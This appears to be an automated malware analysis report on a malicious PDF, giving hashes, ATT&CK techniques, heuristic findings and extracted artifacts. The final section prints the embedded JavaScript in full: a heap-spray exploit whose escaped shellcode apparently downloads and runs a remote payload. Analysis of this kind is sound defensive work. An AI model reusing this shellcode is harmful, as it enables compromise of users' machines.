Malicious PDF — malware analysis report

Static analysis result for SHA-256 7254e51b4e3832ee…

MALICIOUS

PDF

37.7 KB
MD5: a19d9579f3d9b62eaa175ffb35b66161
SHA-1: 231470054792e7f0cd11d5d2d3fa7acd46e42aa7
SHA-256: 7254e51b4e3832ee2532e8b92c629985cde5b1d4811f35512a83a096a1e51c5f
186 Risk Score

Malware Insights

MITRE ATT&CK
  • T1059.007 JavaScript
  • T1203 Exploitation for Client Execution
  • T1566.001 Spearphishing Attachment

The sample is a PDF file containing embedded JavaScript that is heavily obfuscated. The JavaScript appears to be designed to download and execute a second-stage payload from the URL http://www.flashandmath.com. The ML classifier and PDF JavaScript exploit cluster heuristics strongly indicate malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • JavaScript action | low | 2 related findings | PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster | critical | PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream | low | PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • RichMedia (Flash) | high | PDF_RICHMEDIA
    PDF contains /RichMedia (Adobe Flash), which is a historic exploit vector.
  • ASCIIHexDecode filter (with exploit indicators) | medium | PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • Embedded file | low | PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL | info | EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.flashandmath.com (In PDF document text)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (In PDF document text)
    • http://ns.adobe.com/xap/1.0/ (In PDF document text)
    • http://purl.org/dc/elements/1.1/ (In PDF document text)
    • http://ns.adobe.com/xap/1.0/mm/ (In PDF document text)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (In PDF document text)
    • http://adobe.com/AS3/2006/builtin (In PDF document text)

Extracted artifacts 2

Files carved from inside the sample during analysis.

  • Filename: Adobe.swf
    ce5f7936cf8e3536a88a804ce2d6902022df1794fa878bdc64a26866e34ba989
    Kind: pdf-embedded-file
    Source: PDF EmbeddedFile object 16 at offset 0xAD3
    Size: 55839 bytes
  • Filename: javascript_obj0006_000.js
    4eeda950e76e79fa44e09de3a85dc310f31b4ace3655633006b8a5dfe3e8ce1c
    Kind: pdf-javascript-stream
    Source: PDF /JS object 6 at offset 0xF5
    Size: 1582 bytes

Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var padding = String.fromCharCode(37008) + String.fromCharCode(37008);var html = padding + '\u42EB\uB95F\uFFFF\uFFFF\uFE89\uFFB0\uAEF2\u47FE\u89FF\uB0FB\uF2FF\uFEAE\uFF47\uFD89\uAEF2\u47FE\uEBFF\u6074\uC931\u8B64\u3071\u768B\u8B0C\u1C76\u5E8B\u8B08\u2056\u368B\u3966\u184A\uF275\u5C89\u1C24\uC361\u7CEB\u8B60\u246C\u8B24\u3C45\u548B\u7805\uEA01\u4A8B\u8B18\u205A\uEB01\u37E3\u8B49\u8B34\uEE01\uFF31\uC031\uACFC\uC084\u0A74\uCFC1\u010D\uE9C7\uFFF1\uFFFF\u7C3B\u2824\uDE75\u5A8B\u0124\u66EB\u0C8B\u8B4B\u1C5A\uEB01\u048B\u018B\u89E8\u2444\u611C\uE8C3\uFF87\uFFFF\u8EBA\u0E4E\u52EC\uE850\uFF9E\uFFFF\uFF56\uBAD0\u1A36\u702F\u5052\u8FE8\uFFFF\u31FF\u52D2\u5352\u5255\uD0FF\u1AEB\u3DEB\u5AE8\uFFFF\uBAFF\uD87E\u73E2\u5052\u71E8\uFFFF\u31FF\u52D2\uD0FF\u69EB\u42E8\uFFFF\uBAFF\uFE98\u0E8A\u5052\u59E8\uFFFF\u31FF\u81D2\uFFC2\uFFFF\u81FF\uFAEA\uFFFF\u52FF\uFF53\uEBD0\uE8C3\uFEFC\uFFFF\u7275\u6D6C\u6E6F\u642E\u6C6C\u31FF\u3131\u3131\u632E\u646D\u20FF\u7468\u7074\u2F3A\u742F\u7572\u616C\u3034\u2E38\u6577\u6862\u736F\u6974\u676E\u632E\u6D6F\u752E\u2F61\u6C62\u2F32\u642F\u776F\u6C6E\u616F\u5F64\u6966\u656C\u702E\u7068\u653F\u413D\u6F64\u6562\u322D\u3130\u2D30\u3832\u3438\uCDFF\u0003';while (padding.length < 65564){	padding+=padding;}var value = padding.substring(0, 0x5f4);value += html;value += padding;var destination = value.substring(0, 32768);while(1){	destination += destination;	if(destination.length >= 524288) break;}var today = destination.substring(0, 524288 - 2060);var forever = new Array();for (var infinite = 0; infinite < 496; infinite++){	forever[infinite]=today+'s';}